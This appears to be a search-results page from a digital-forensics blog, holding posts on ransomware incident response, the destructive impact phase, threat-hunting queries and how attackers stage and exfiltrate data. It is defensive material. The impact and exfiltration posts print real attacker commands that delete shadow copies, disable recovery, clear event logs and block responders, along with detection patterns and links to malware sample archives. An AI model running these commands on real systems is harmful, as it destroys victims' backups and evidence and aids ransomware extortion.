top of page

Search Results

326 items found for ""

  • What to Do After a Ransomware Attack

    Ransomware attacks are among the most devastating incidents an organization can face. They can cripple your operations, lead to significant financial loss, and damage your reputation. When a ransomware campaign is in progress, the clock is ticking, and how you respond in those critical moments can determine the extent of the damage. Immediate Response: The Clock Is Ticking The first thing to understand is that ransomware incidents require immediate action. The sooner you detect the ransomware actor in your network, the better your chances of minimizing damage. Here are the possible scenarios: Immediate Detection Upon Network Access: GREAT!  Work fast! This is the best-case scenario where you can potentially stop the attack before it causes significant harm. Detection After They’ve Been in Your Network for a While: Work faster!  At this point, the attacker may have already exfiltrated data or planted the encryption payload. Time is of the essence. Detection Pre- or Post-Exfiltration, But Before Encryption: If you catch them in this window, you still have a chance to prevent encryption. However, be prepared for the possibility that encryption is imminent. Detection After Encryption: Sadly, this is the most common scenario.  At this stage, the focus shifts to damage control and recovery. In all these scenarios, having a pre-incident response plan is crucial. Without it, your response will be too slow, leading to greater damage. Initial Incident Scoping: Key Considerations When you first identify a ransomware incident, you need to quickly assess the situation. Here's what to consider: How was the incident identified? Did someone notify you? Did you discover a ransom note or a service that stopped functioning? Which hosts and services are impacted? Identify all the systems that have been compromised to understand the scope of the attack. What actions have already been taken? Determine if any containment measures have been initiated and whether they were effective. What are the organization’s expectations? Communicate with leadership to understand their priorities and what they expect from the incident response. What are the “crown jewels” of the organization? Identify critical assets that need immediate protection. Do backups exist, and are they unencrypted? Confirm the availability and integrity of backups, as they will be key to recovery. Do up-to-date network diagrams exist? Accurate network diagrams are essential for understanding how the attack is spreading and for planning your response. Is there an MSSP (Managed Security Service Provider) who can assist? If available, leverage external expertise to enhance your response efforts. Collecting and Preserving Evidence Evidence preservation is critical in a ransomware investigation. Here’s how to approach it: Physical Evidence: Take a physical picture of the ransom note immediately, as it might be encrypted or deleted later. Virtual Machines: If possible, pause virtual machines rather than shutting them down. Pausing a VM typically saves its memory state, which can be valuable for investigation. Memory Capture: Capture a memory image from compromised systems to analyze for forensic evidence. Backup Protocols: Review and Invoke When ransomware hits, you may lose access to critical protocols needed for response. Here’s what to do: Active Directory (AD) Availability: Be prepared for AD to be down, which is common in ransomware cases. Have alternative methods to navigate the network and access machines. Local Accounts and Cached Domain Credentials: Ensure that machines have local accounts or cached credentials to maintain access. Deployment Methods for Data Collection: If you need to install tools for data collection, ensure you have a deployment method available. Out-of-Band Communication: Establish secure communication channels that are not dependent on the compromised network. Securing Backups: Protecting the Crown Jewels Your backup servers must be secured immediately: On-Prem Backup: Disconnect from the network to prevent ransomware from spreading to backups. Cloud-Based Backup: Consider disconnecting, depending on the situation, to protect your data. “Going Dark” – Cutting Internet Access If the threat actor is still active in your environment and you suspect imminent encryption, you may need to cut internet access: Major Decision with Far-Reaching Consequences: This decision is not to be taken lightly and should be made by top leadership. While it might prevent encryption, it will disrupt business operations. Pre-Plan Policies: Ensure you have pre-planned policies in place for such scenarios. Create pinholes for essential services like VPN, EDR, and remote IR connectivity. Disabling Shares, Sync Agents, and Accounts Admin Shares: Disabling admin shares can thwart threat actors but may disrupt services. Conduct a risk analysis beforehand. Network Shares and Distributed File Systems: Consider taking these down to protect them from encryption. Credential Remediation: Reset credentials and disable accounts to prevent the threat actor from regaining access. Recovery from Backup Recovering from backups is a critical step, but timing is everything: Hold Off Restoral Until You’re Sure: Ensure you know the exact date(s) to fall back to for recovery. Restoring from a compromised backup could reinfect your network. Edge Devices: Firewalls and VPNs may have been exploited. Consider updating and restoring them to factory state to eliminate persistence mechanisms. Post-Incident: Turning a Crisis into an Opportunity A ransomware attack, while devastating, can also be an opportunity for your security team to gain the attention and support it needs: Increased Support and Funding: Use the incident as leverage to secure more resources for your security team. Staff Augmentation: Advocate for additional staffing to prevent future incidents. Final Thoughts: Learn, Plan, and Prepare Ransomware incidents are complex and require swift, decisive action. Preparation is key. Learn from each incident, refine your response plans, and ensure that your organization is better prepared for the next attack. Akash patel

  • Final Phase of a Ransomware Attack: Impact and Recovery Challenges

    Ransomware attacks have become increasingly sophisticated, and the “Impact” phase represents the final, most destructive part of the attack campaign. During this phase, after threat actors have achieved their initial objectives, including data exfiltration, they may deploy a ransomware cryptor to encrypt your data. To maximize their leverage, these actors often tamper with your backup and recovery mechanisms, aiming to make recovery difficult and squeeze you into paying the ransom. Securing Your Backup Systems Your backups are one of the most critical assets to secure in your organization. Threat actors often target backup servers to disable or delete backups before deploying ransomware . Here are some essential steps to secure your backups: Monitor All Logins to Backup Servers : Ensure that every login attempt to your backup servers is monitored and logged. This includes successful logins as well as failed attempts. Implement the Principle of Least Privilege : Only designated accounts should have the necessary permissions to access and perform administrative actions on backup servers. Restrict access as much as possible to minimize the attack surface. Scanning for Backup Services : Ransomware affiliates frequently scan for backup services by checking for open ports on well-known systems. To prevent this: Review Documentation : Refer to your backup system’s documentation to understand which ports are used for various services. Set Up Alerts : Monitor these ports and set up alerts for any suspicious activity. Volume Shadow Copy Service (VSS) Many organizations rely on Microsoft’s Volume Shadow Copy Service (VSS) for backups. While VSS can be a convenient way to back up critical files, it can also pose a security risk. VSS keeps copies of essential system files, such as registry hives, in an unlocked state, making them vulnerable to threat actors. Commands Used to Delete Shadow Copies : Ransomware operators may use the following commands to delete VSS shadow copies, thereby eliminating one of your recovery options: vssadmin.exe delete Shadows /all /quiet wmic shadowcopy delete /nointeractive Get-WmiObject Win32_ShadowCopy | % { $_.Delete() } Get-WmiObject Win32_ShadowCopy | Remove-WmiObject Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_Delete(); } Get-CimInstance Win32_ShadowCopy | Remove-CimInstance By deleting these shadow copies, the attackers remove a significant recovery option, making it crucial to protect and monitor VSS on your systems. Tampering with Recovery Mechanisms Threat actors often disable built-in recovery components using native tools, making it difficult for organizations to recover from an attack. They may use tools like bcdedit , which manipulates Boot Configuration Data (BCD) settings , or wbadmin , which configures settings for Windows Backup. Commands Used to Disable Recovery Mechanisms : bcdedit /set {default} recoveryenabled no bcdedit /set {default} bootstatuspolicy ignoreallfailures wbadmin delete catalog –quiet wbadmin delete systemstatebackup -keepversions:0 Preventing IT Response In addition to tampering with backup and recovery mechanisms, threat actors may also prevent IT teams from responding to the attack by weaponizing security mechanisms. They may disable Remote Desktop Protocol (RDP) or block inbound connectivity via Windows Firewall. Common Commands Used : Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled True New-NetFirewallRule -DisplayName "Block PORTS1" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Block New-NetFirewallRule -DisplayName "Block PORTS2" -Direction Inbound -LocalPort 443 -Protocol TCP -Action Block netsh advfirewall set currentprofile state on netsh advfirewall set allprofiles state on netsh advfirewall firewall add rule name="Block PORTS6" protocol=TCP dir=in localport=80 action=block netsh advfirewall firewall add rule name="Block PORTS7" protocol=TCP dir=in localport=443 action=block These measures make it extremely difficult for IT teams to access affected hosts and respond to the threat, emphasizing the need for robust monitoring and proactive defense mechanisms. Clearing Windows Event Logs Threat actors often clear Windows Event Logs to cover their tracks. Unfortunately, this is a simple task in Windows, especially if logs are not being forwarded to a SIEM, log aggregator, or syslog server. The command Clear-EventLog is commonly used for this purpose. Commands to Clear Event Logs : Get-EventLog -LogName Security | Clear-EventLog Clear-EventLog -LogName Application, Security, System Clearing event logs can make post-incident analysis extremely difficult, highlighting the importance of having log forwarding in place. Payload Deployment Methods Ransomware payloads are often deployed via Group Policy Objects (GPOs). Unfortunately, many organizations do not audit GPO deployment, and admin accounts are often overprivileged. This lack of oversight can allow threat actors to create and deploy GPOs without constraint, leading to widespread ransomware deployment across a domain or forest. Threat actors may also use existing deployment methods such as SCCM, PDQ, or SolarWinds to deliver ransomware payloads. In addition, they commonly use native Windows tools like PSExec, WMIC, and BITS to execute processes remotely . Background Intelligent Transfer Service (BITS) : BITS is a Windows service that transfers data in the background, often used by Microsoft to download updates . It’s an intelligent service that minimizes impact on user experience by managing bandwidth effectively. However, threat actors can exploit BITS to transfer malicious payloads. Detection Methods : EDR, Event IDs 4688/4689 | Sysmon IDs 1/5 : Monitor for bitsadmin.exe and review PowerShell logs for related cmdlets. Event ID 7036 : Monitor for service state changes in the System log. Event ID 60 : BITS has stopped transferring a file. Look for temporary files named BITFxxxx.tmp created in the target transfer directory. Example Using Sysmon Event ID 11 : Monitor file creation events for BITS temporary files. file_path.keyword:/.*\\BITF[0-9]+\.tmp/ Encryption Key Usage in Ransomware Modern ransomware typically uses asymmetric key encryption, also known as public key cryptography. The public key, embedded within the ransomware payload, encrypts the victim's data. The private key, which is necessary for decryption, remains with the attacker, and victims must pay the ransom to obtain it. File Write Methods: Overwrite vs. Copy/Delete Ransomware payloads use two general file write methods: Overwrite/Rename:  Opens the original file, replaces its contents with encrypted data, and renames the file. Copy/Delete:  Creates a new file with encrypted data, then deletes the original file. From a forensic perspective, the Overwrite/Rename method might leave evidence in the $UsnJrnl or $LogFile , while the Copy/Delete method might allow recovery of "deleted" files from unallocated disk space using tools like Bulk Extractor and PhotoRec. I already have a blog recoverying evidence using Photorec do check it out: https://www.cyberengage.org/post/digital-evidence-techniques-for-data-recovery-and-analysis Detecting Encryption and Ransom Notes Monitoring for file creation events using Sysmon/EDR can help detect ransomware activity. Sysmon Event ID 2, for instance, logs file creation time changes, which can be indicative of ransomware encryption. To understand how a specific ransomware payload encrypts files, reverse engineers and malware analysts often disassemble or decompile the ransomware's code using tools like IDA Pro and Ghidra. Detailed write-ups on ransomware samples are valuable resources for incident response. The VX-Underground team maintains extensive collections of malware samples, including ransomware families, which can be instrumental for analysis. https://for528.com/vxug-samples The team also maintains an archive with various builders, including ransomware builders! https://vx-underground.org/ Importance of Backing Up Encrypted Files Backing up encrypted files is crucial because: Partially Encrypted Files:  May still contain recoverable data. Future Decryption Possibilities:  Decryption keys or tools may become available in the future. If using a decryptor, exercise caution. Some decryptors may be flawed, ineffective, or even malicious. Always perform malware analysis on any decryptor before use. Free decryptors for some ransomware variants are available at No More Ransom’s site, which also offers the “Crypto Sheriff” tool for identifying ransomware strains and checking for available decryption resources. https://www.nomoreransom.org/en/decryption-tools.html https://www.nomoreransom.org/crypto-sheriff.php?lang=en Efficiency Issues with Decryptors Decryptors, even those provided by attackers after paying the ransom, are not always efficient. They may be slow, non-multithreaded, or otherwise poorly designed . For example, the decryptor provided by DarkSide ransomware during the Colonial Pipeline attack was notoriously slow, leading responders to develop a custom tool using the provided decryption key. Remember:  Always back up encrypted data before attempting decryption to avoid potential data loss. Conclusion By understanding the methodologies and tactics employed during the "Impact" phase of a ransomware attack, organizations can better prepare their defenses, respond more effectively, and mitigate the risks associated with these increasingly sophisticated threats. Akash Patel

  • Mastering Threat Detection/Hunting with Specific Queries

    When it comes to detecting malicious activity and potential security threats, analyzing the right data sources is crucial. Whether you are working with SIEM tools, conducting threat hunting, or performing forensic analysis, the following queries can be invaluable. The logic behind these queries remains consistent, though the format may need to be adjusted based on the platform you are using, such as Timesketch, Kibana, or other log management systems. 1. Detecting System Configuration and Host Information CurrentControlSet This query extracts information about the CurrentControlSet, which can help in understanding the system's boot configuration. Query: parser:winreg AND key_path:"HKEY_LOCAL_MACHINE\\System\\Select*" Host Network Interfaces Identify network interfaces configured on the host to monitor network-related configurations and potential unauthorized changes. Query: parser:winreg AND key_path:"*Parameters\\Interfaces*" Hostname Retrieve the hostname of the system, which can be used for identification in multi-host environments. Query: parser:winreg AND key_path:"*Control\\ComputerName\\ComputerName*" Network Shares Monitor network shares on the host, which can reveal potentially exposed resources or unauthorized access. Query: parser:winreg AND key_path:"*Lanmanserver\\Shares*" AND NOT message:*empty* Software-SysInternals Tool Usage Indicator Detect usage of SysInternals tools, which are often used by both administrators and attackers. This query checks for evidence that the tools have been executed. Query: parser:"winreg" AND key_path:"*Software\\Sysinternals\\*" AND values:"*EulaAccepted*" 2. Monitoring Remote Desktop Protocol (RDP) Activity T1021.001 - AV Scanning Disabled for Attachments This query identifies registry modifications related to the disabling of antivirus scanning for RDP attachments. Query: parser:winreg AND (key_path:"*Microsoft\\Terminal Server Client\\Default*" OR key_path:"*Microsoft\\Terminal Server Client\\Servers*") T1021.001 - RDP Activity Ended Monitor for events that indicate the end of an RDP session, which could signify the end of a potential unauthorized access. Query: (parser:"winevtx" AND source_name:"Microsoft-Windows-TerminalServices-LocalSessionManager" AND ((event_identifier:24 AND NOT xml_string:"*Address>LOCAL*") OR event_identifier:39 OR event_identifier:40 OR event_identifier:23)) OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4779) T1021.001 - RDP Activity Started Detect when an RDP session starts, focusing on non-local connections that may indicate remote access attempts. Query: (parser:"winevtx" AND source_name:"Microsoft-Windows-TerminalServices-LocalSessionManager" AND ((event_identifier:21 AND NOT xml_string:"*Address>LOCAL*") OR (event_identifier:22 AND NOT xml_string:"*Address>LOCAL*") OR (event_identifier:25 AND NOT xml_string:"*Address>LOCAL*"))) OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4624 AND xml_string:"*LogonType\">10*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4778) 3. Identifying Potential Lateral Movement T1021.002 - Potential SMB Lateral Movement (Source) Track SMB connections that might indicate lateral movement attempts, particularly focusing on connections over port 445. Query: parser:winevtx AND source_name:"Microsoft-Windows-Security-Auditing" AND event_identifier:4648 AND xml_string:"*IpPort\">445*" 4. Monitoring Task and Script Execution T1053.005 - Scheduled Tasks Scheduled tasks can be used by attackers to persist on a system. This query helps detect such tasks, excluding common Microsoft tasks. Query: parser:winreg AND key_path:"*CurrentVersion\\Schedule\\TaskCache\\Tree*" AND NOT key_path:"*CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft*" AND NOT message:"*SD: [REG_BINARY] (220 bytes)*" T1059 - PowerShell Web Request Detect the use of PowerShell for web requests, which is a common technique in fileless malware attacks. Query: parser:"winevtx" AND (event_identifier:"4104" OR event_identifier:"4688" OR event_identifier:"1") AND (message:"*Invoke-WebRequest*" OR message:"*iwr*" OR message:"*wget*" OR message:"*curl*" OR message:"*Net.WebClient*" OR message:"*Start-BitsTransfer*") T1059.001 - PowerShell Configuration Monitor changes to PowerShell settings, which might indicate an attacker attempting to modify execution policies or script logging. Query: parser:"winreg" AND key_path:"*Microsoft\\PowerShell*" AND (message:*EnableScript* OR message:*ExecutionPolicy* OR message:*EnableModuleLogging*) 5. Security Monitoring and Defense Evasion T1070.001 - Windows Log Cleared This query detects the clearing of Windows event logs, a common technique used by attackers to cover their tracks. Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Eventlog" AND event_identifier:"1102" T1078 - Windows Account Activity Monitor for changes in user accounts, such as enabling, disabling, or modifying permissions. Query: parser:"winevtx" AND (event_identifier:"4722" OR event_identifier:"4724" OR event_identifier:"4728" OR event_identifier:"4634" OR event_identifier:"4672" OR event_identifier:"4733") T1078.003 - Query for a Blank Password for An Account Detect attempts to query or check for blank passwords on accounts, which may indicate password-guessing attacks. Query: parser:"winevtx" AND event_identifier:"4797" 6. Detecting Suspicious Network Activity and Proxy Configurations T1090 - Proxy Config Identify modifications to proxy settings, which may indicate the presence of proxy-aware malware or unauthorized network changes. Query: parser:"winreg" AND key_path:"HKEY_LOCAL_MACHINE\\Software\\*\\Microsoft\\Windows\\CurrentVersion\\Internet Settings*" AND (values:*AutoDetect* OR values:*ProxyServer* OR values:*ProxyOverride* OR values:*ProxyEnable*) T1110 - SQL Server Failure Monitor SQL Server authentication failures, which may indicate brute-force or dictionary attacks. Query: parser:winevtx AND display_name:"*Logs\\Application\.evtx" AND event_identifier:"18456" T1110 - Suspicious Logon Failures Track multiple failed login attempts across different accounts, which may be indicative of password spraying or brute force attacks. Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Security-Auditing" AND (event_identifier:"4625" OR event_identifier:"4767" OR event_identifier:"4740" OR event_identifier:"4776") T1197-Suspicious BitsTransfer Activity Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Bits-Client" AND event_identifier:"59" AND (strings:"*\.ps1*" OR strings:"*\.bat*" OR strings:"*\.exe*" OR strings:"*\.dll*" OR strings:"*\.zip*" OR strings:"*\.rar*" OR strings:"*\.7z*" OR strings:"*\.tar*") T1204-Execution Query: (parser:"winreg" AND (key_path:"*Microsoft\\Windows\\ShellNoRoam\\MUICache*" OR key_path:"*Software\\Microsoft\\Windows\\Shell\\MUICache*")) OR parser:"prefetch" OR (parser:"winevtx" AND event_identifier:"4688") OR (parser:"winreg" AND key_path:"*LastVisitedPidlMRU*") OR (parser:"winreg" AND key_path:"*LastVisitedMRU*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Application-Experience" AND event_identifier:"500") T1204-Execution of a Binary via BAM Query: parser:"bam" AND binary_path:*exe T1204-Execution or Existence of a File Query: parser:"appcompatcache" AND (path:*exe* OR path:*cpl* OR path:*ps1* OR path:*msi* OR path:*dll* OR path:*bat*) T1204-User Execution or Shortcut Query: parser:"userassist" AND (value_name:*lnk* OR value_name:*exe*) T1543-Installation or Execution of a Windows Service Query: parser:"winevtx" AND (event_identifier:"7045" OR event_identifier:"4697") AND NOT message:"*svchost.exe -k*" T1546.003-WMI CommandLine Consumer Query: tag:Execution AND message:*wmiprvse* T1547.001-Windows Autorun Query: parser:"windows_run" AND (message:*exe* OR message:*.dll* OR message:*.bat* OR message:*.ps1*) T1548.002-UAC Disabled in Registry Query: parser:"winreg" AND key_path:"*Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA" AND message:"*DisplayType: [REG_DWORD_LE] 0*" T1560 or T1083-File Save or Discovery Query: parser:"winreg" AND key_path:*OpenSave*MRU* AND message:*Shell* T1560.001-Archived Files Query: (data_type:"windows:lnk:link" OR data_type:"windows:shell_item:file_entry" OR data_type:"olecf:dest_list:entry" OR data_type:"windows:registry:mrulistex") AND (message:*.zip* OR message:*.7z* OR message:*.tar.gz* OR message:*.tar* OR message:*.gz*) T1562.001-Win Defender Disabled Query: parser:"winevtx" AND source_name:"Microsoft-Windows-Windows Defender" AND (event_identifier:"5001" OR event_identifier:"5010" OR event_identifier:"5012") T1562.001-Windows Defender Disabled Registry Key Query: parser:"winreg" AND key_path:"*Microsoft\\Windows Defender*" AND (values:"*DisableRealtimeMonitoring: \[REG_DWORD_LE\] 1*" OR values:"*DisableAntiSpyware: \[REG_DWORD_LE\] 1*" OR values:"*DisableAntiVirus: \[REG_DWORD_LE\] 1*" OR values:"*DisableBehaviorMonitoring: \[REG_DWORD_LE\] 1*" OR values:"*DisableIOAVProtection: \[REG_DWORD_LE\] 1*" OR values:"*DisableOnAccessProtection: \[REG_DWORD_LE\] 1*" OR values:"*DisableScanOnRealtimeEnable: \[REG_DWORD_LE\] 1*" OR values:"*DisableEnhancedNotifications: \[REG_DWORD_LE\] 1*" OR values:"*DisableBlockAtFirstSeen: \[REG_DWORD_LE\] 1*") T1562.001-Windows Defender Disabled via PS Query: parser:"winevtx" AND message:"*Set-MpPreference*" AND (message:"*Disable*" OR message:"*Reporting*" OR message:"*SubmitSamplesConsent*" OR message:"*DefaultAction*") T1562.001-Windows Defender Exclusions Query: (parser:"winreg" AND key_path:"*Windows Defender\\Exclusions\*" AND NOT message:*empty*) OR (parser:"winevtx" AND event_identifier:"5007" AND message:*Exclusions*) T1562.004-Windows Firewall Disabled Query: parser:"winreg" AND (display_name:*SOFTWARE OR display_name:*SYSTEM) AND (message:"*EnableFirewall: [REG_DWORD] 0x00000000*" OR message:"*EnableFirewall: [REG_DWORD_LE] 0*") T1562.004-Windows Firewall Rules Query: (parser:"winreg" AND key_path:"*FirewallRules*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Windows Firewall With Advanced Security" AND event_identifier:"2005") Timezone Query: parser:"winreg" AND key_path:"*Control\\TimeZoneInformation*" Windows Network Adapter Details Query: parser:"winreg" AND key_path:"*Tcpip/Parameters/Interfaces*" AND NOT message:*empty* Windows OS Version Query: parser:"winreg" AND data_type:"windows:registry:installation" Windows Patch Installation Success Query: parser:"winevtx" AND source_name:"Microsoft-Windows-WindowsUpdateClient" AND display_name:"*System\\.evtx" AND event_identifier:"19" Windows User Profiles Query: parser:"winreg/winreg_default" AND key_path:"*ProfileList*" These queries form the backbone of effective threat detection and forensic analysis. Happy hunting! Akash Patel

  • Ransomware Actors Access and Stage Data for Exfiltration

    Ransomware attacks continue to evolve, with actors using advanced tactics to access and exfiltrate sensitive data. Understanding their methods is crucial for preventing and mitigating the damage they cause. 1. Data Access: Network Shares – Enumerated and Reviewed One of the primary targets for ransomware actors is your network shares. To find and exploit them, attackers use various tools, such as: VeilFramework's Invoke-ShareFinder cmdlet:  This tool allows a ttackers to enumerate network shares within a domain. You can explore the tool or test its capabilities by visiting its GitHub repository at Veil-PowerView's Invoke-ShareFinder . SharpShares:  Another popular tool among ransomware actors is SharpShares, which queries all hosts in a domain and checks the current user's access to shares . You can find more about SharpShares at SharpShares GitHub . Example commands from the leaked Conti chat logs illustrate how these tools are used: 1. Invoke-ShareFinder -Domain [domain_name_here].local | Out-File sharfindINFO.txt 2. SharpSharesNG.exe shares Attackers may also map shares directly using legitimate tools and commands, like: net use * "\\192.168.168.10\Shares" /persistent:no /user:DOMAIN\username To detect such share access attempts, two essential event IDs should be enabled: Event ID 5140:  A network share object was accessed. Event ID 5145:  A network share object was checked to see if the client could be granted access. These events can be enabled with the following command: auditpol /set /category:"Object Access" /success:enable Enabling these events allows you to monitor share access and changes, offering insights into potential data exfiltration activities. 2.   Identifying Network Share Access via the Registry Network share access can also be traced through various registry keys: Mapped Network Drive Most-Recently Used (MRU) items: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU Mapped Network Drives (Network Drive Wizard): HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 Items Typed into Windows Explorer: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths Items Typed into the Windows Run Dialog: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU All Open Shares on a System: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares 3. Forensic Analysis of File and Folder Access From a forensic perspective, identifying which files or folders were accessed is crucial. Here are some key artifacts to examine: Open/Save MRU, Recent Files, Shellbags, LNK Files, Last-Visited MRU, Office Recent Files. For Files or folders were accessed, refer to my previous blog posts: Artifacts for File Opening & Creation (Part 1): Open/Save MRU, Recent Files, Shellbags Artifacts for File Opening & Creation (Part 2): Last-Visited MRU, Office Recent Files, LNK Files To identify deleted files or evidence of file access, explore these links: Artifacts for Deleted File & File Knowledge (Part 1): ACMRU, Last-Visited MRU, Vista/Win7/10 Artifacts for Deleted File or File Knowledge (Part 2): Search, WordWheelQuery, Index.dat File 4. Registry Artifacts: TypedPaths & TypedURLs TypedPaths can reveal user activity within the Windows Registry: TypedPaths:  Insights available at Part 1: Windows Registry Artifacts - Insights into User Activity TypedURLs are stored in the following registry path: NTUSER.DAT\Software\Microsoft\Internet Explorer\TypedURLs TypedURLs store locations entered into the Internet Explorer/Edge address bar, similar to TypedPaths. Data Exfiltration 1. Data Exfiltration: Staging and Compression Before exfiltrating data, ransomware actors typically compress the data into archive files. Common formats include .zip, .7z, and .rar. Adversaries often use tools like 7za.exe or rar.exe to perform these actions. Be alert for these file types in your network, especially .rar files. Native compression methods that can be leveraged include: Compress-Archive cmdlet tar command Send to > Compressed folder 2. Data Staging Attackers often prepare data for exfiltration by copying files to a staging directory, typically a temporary folder. Files may be copied, renamed, or bundled into archives. These operations might go unnoticed unless specific alerts are configured. When reviewing a system for potential data staging , you want to focus on archive creation. Analysis of the MFT and UsnJrnl can prove extremel y useful in this endeavor. Reviewing Sysmon Event ID 11 (File Creation) can be very useful, as you can see the exact size of any archives created. 3. Creation of Multiple Text Files Adversaries may redirect tool outputs to text files since text files compress well, reducing the size of exfiltrated data significantly. By converting large files into text format, gigabytes of data can be reduced to mere megabytes, making exfiltration easier and less detectable. Note: Adversaries (especially in ransomware cases!) often will delete the archives they have exfiltrated. They do not want you to have access to what they stole. In this case, you may need to rely on $UsnJrnl:$J analysis. You might ask question  If you have $mft why you need to rely on $UsnJrnl:$J analysis, to identify data exfiltration? Answer is  1. While $MFT provides a snapshot of the file system at specific points in time, the $UsnJrnl:$J tracks file system events in greater detail over time 2. Exfiltration might involve subtle modifications, renaming, or deletion of files. The $MFT might not capture all of these events, while the $UsnJrnl:$J can give you insights into every file operation, which is crucial for detecting sophisticated exfiltration techniques. Example: If an attacker creates a zip file to bundle exfiltrated data, the $MFT will record the creation of that zip file . However, the $UsnJrnl:$J will log the sequence of events , like file additions to the zip, the exact time of zipping, and any renaming or moving of the file before exfiltration. 4. WinZip, 7-Zip, and WinRAR Artifacts Adversaries frequently use popular tools like WinZip, 7-Zip, and WinRAR to compress and archive data. These tools leave traces in the registry, which can be useful for forensic analysis: WinZip Registry Path : NTUSER.DAT\Software\Nico Mak Computing\WinZip\ 7-Zip Registry Path : NTUSER.DAT\Software\7-Zip\ WinRAR Registry Path : Located in the user's NTUSER.DAT hive, this data can provide valuable information about archives created or manipulated during the incident. 5. Detecting Renamed Executables Ransomware actors often rename executables (PE files), but they rarely edit the file's VERSIONINFO resource . This metadata includes fields like Description, Product, Company , and OriginalFileName . The OriginalFileName can be particularly useful for threat hunting. You can query identify these executables in Sysmon Event ID 1, Security Event ID 4688/4689, or via your EDR if deployed. Cloud-Based File Sharing Sites Adversaries might use cloud services like MEGA, SendSpace, WeTransfer, Google Drive, Dropbox, Box, OneDrive, or cloud-based storage buckets such as AWS, GCP, and Azure. Blocking unauthorized access to these platforms can prevent exfiltration. The "Living Off Trusted Sites" (LOTS) project catalogs sites used for malicious purposes, including data exfiltration and phishing. You can explore the LOTS project. https://lots-project.com/ FTP/SFTP Exfiltration Despite FTP being an insecure protocol, it remains a popular choice for data exfiltration. FTP uses ports 20 and 21, while SFTP uses port 22. Tools like WinSCP and FileZilla are often employed by adversaries: FileZilla Log Locations : %APPDATA%\FileZilla\filezilla.xml %APPDATA%\FileZilla\recentservers.xml %APPDATA%\FileZilla\trustedcerts.xml %APPDATA%\FileZilla\sitemanager.xml %APPDATA%\FileZilla\*.sqlite3 Example of PowerShell code used for FTP data transfer $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile") $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password) $FTPRequest.UseBinary = $true $FTPRequest.UsePassive = $true 2. WinSCP Registry Artifacts WinSCP, another popular file transfer tool, leaves traces in the registry that may help in detecting exfiltration: Registry Paths : HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\CDCache HKCU\Software\Martin Prikryl\WinSCP 2\Configuration\Logging HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\History\LocalTarget HKCU\SOFTWARE\Martin Prikryl\WinSCP2\Configuration\History\RemoteTarget 3. RDP Exfiltration Exfiltration through Remote Desktop Protocol (RDP) is challenging to detect , as Windows does not log what files are copied out of the network. However, RDP clients can map local drives to remote sessions, creating shares such as \\tsclient\C\. These UNC paths may appear in process creation events or command lines. (i). RDP bitmap cache parsing is a longshot when it comes to identifying potential exfil. 4. Rclone – The Ransomware Actor’s Little Buddy Rclone, a synchronization tool compatible with over 40 services, is often used by ransomware actors for data exfiltration. Adversaries usually do not rename rclone.exe or rclone.conf, making them easier to detect. You can learn more about Rclone and its supported services on its https://rclone.org/docs/#config-config-file the list of https://rclone.org/#providers 5. Power Consumption as a Detection Method Data exfiltration can be associated with high power consumption. Transferring data requires power for the network interface and the transferring program. Tools like Rclone and MEGAsync might show up in power efficiency reports stored at C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics. The SRUM database has also proven useful for power consumption analysis, which can help identify suspicious exfiltration activities. You can explore SRUM further in the following posts: SRUM: The Digital Detective in Windows How to Use SRUMECmd to Parse and Analyze SRUDB.dat Files 6. MEGAsync IOCs MEGAsync, another tool often used for exfiltration, leaves behind artifacts that could aid in investigation: Scheduled Task Name : \MEGA\MEGAsync Update Task Config File  (encrypted): %LOCALAPPDATA%\Mega Limited\MEGAsync\MEGAsync.cfg Executable : %LOCALAPPDATA%\Mega Limited | %LOCALAPPDATA%\MEGAsync Log Files : %LOCALAPPDATA%\Mega Limited\MEGAsync\logs\ Registry Setting : HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CLSID of Mega}\Instance\InitPropertyBag\TargetFolderPath 7. LockBit’s StealBit Tool LockBit ransomware operators have developed a custom exfiltration tool called StealBit, known for its high efficiency and speed. For a deep dive into LockBit’s arsenal and the StealBit tool, check out Cybereason’s threat analysis report . 9. Network-Based Exfiltration Detection While network logs such as firewall and NetFlow logs can help determine the amount of data exfiltrated, they do not reveal the content. Look for traffic spikes, off-hours activity, or protocol tunneling (e.g., DNS) as indicators of potential exfiltration. Though it may be difficult to prove what exact data was exfiltrated, tracking these indicators can provide valuable leads in your investigation. Be vigilant, keep learning stay safe Akash Patel

  • Lateral Movement in Cyber Attacks: Key Protocols, Tools, and Detection Methods

